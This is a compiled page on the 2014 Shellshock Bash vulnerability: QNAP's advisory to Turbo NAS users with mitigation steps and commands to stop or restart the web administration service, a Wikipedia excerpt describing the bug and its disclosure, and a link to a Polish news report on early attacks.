Security Advisory for Turbo NAS Users

Security Advisory for Turbo NAS Users
September 26, 2014

Dear customers,
This week there was a serious security flaw discovered for many Unix and Linux-based systems (CVE-2014-6271). QNAP® Systems, Inc. has been looking into the recent concerns over potential Bash code injection (CVE-2014-6271) that can lead to security vulnerabilities on the Turbo NAS and other Unix/Linux-based systems. A partial solution for CVE-2014-6271 exists but may result in another security vulnerability (CVE-2014-7169). QNAP is actively working on a solution for this issue, but in the meantime encourages all Turbo NAS users to take the following immediate actions to avoid any possible exploitation of their system.

As a temporary measure until a solution is released for this issue, please ensure that the following services of the Turbo NAS are disconnected from the Internet:
  • Web administration
  • Web server
  • WebDAV
  • Photo Station, Music Station, File Station, and any other NAS app that uses a web-based interface
Normally the local network is not accessible from the Internet easily, users can still use their Turbo NAS safely. If users still worry about the security of their local network, they can follow the steps to disable the QTS web UI completely, and only turn it on when necessary:
  • Login to QTS and disable the Web Server in Applications
  • Login to QTS and disable the secure connection (SSL) in General Settings
  • Disable NAS web administration using a SSH utility (such as putty):
    1. Connect to the Turbo NAS with admin username and password
    2. Type the following command and hit the “Enter” key:
      Bash:
      /etc/init.d/thttpd.sh stop
Note: The NAS web administration will become unavailable after taking the above steps. To restore it:
  1. Restart the Turbo NAS, or
  2. Manually start the web administration via SSH by typing the following command:
    Bash:
    /etc/init.d/thttpd.sh start
QNAP will keep users updated with the latest information as addressing this issue. If users would like further assistance, please contact QNAP Technical Support at Helpdesk
 
Shellshock (software bug) - Wikipedia, the free encyclopedia
Shellshock, also known as Bashdoor[1] or the Bash bug,[2] is a security bug, disclosed 24 September 2014 in the widely-used Unix Bash shell. The bug causes Bash to execute commands from environment variables unintentionally.[1][3] While Bash is not an Internet-facing service, many Internet-facing daemons call it internally, allowing an attacker to use an Internet-facing service that sets the contents of an environmental variable to have Bash execute the commands in the variable. DHCP clients are also potentially vulnerable, and more affected services are expected to be found.[4]

The bug was discovered 12 September 2014 by Stéphane Chazelas,[1] who suggested the name "bashdoor".[1] It was assigned the bug the CVE identifier CVE-2014-6271, kept under embargo until 24 September 2014 14:00 UTC, in order to ensure that security updates were available for most systems[5] as soon as the details were made public. Within days a series of further related vulnerabilities in Bash were been found: CVE-2014-7169, CVE-2014-7186 and CVE-2014-7187, leading to the need for further patches.
Polish >> (first attacks)

» “Chińczycy” już wykorzystują dziurę w Bashu do ataków -- Niebezpiecznik.pl --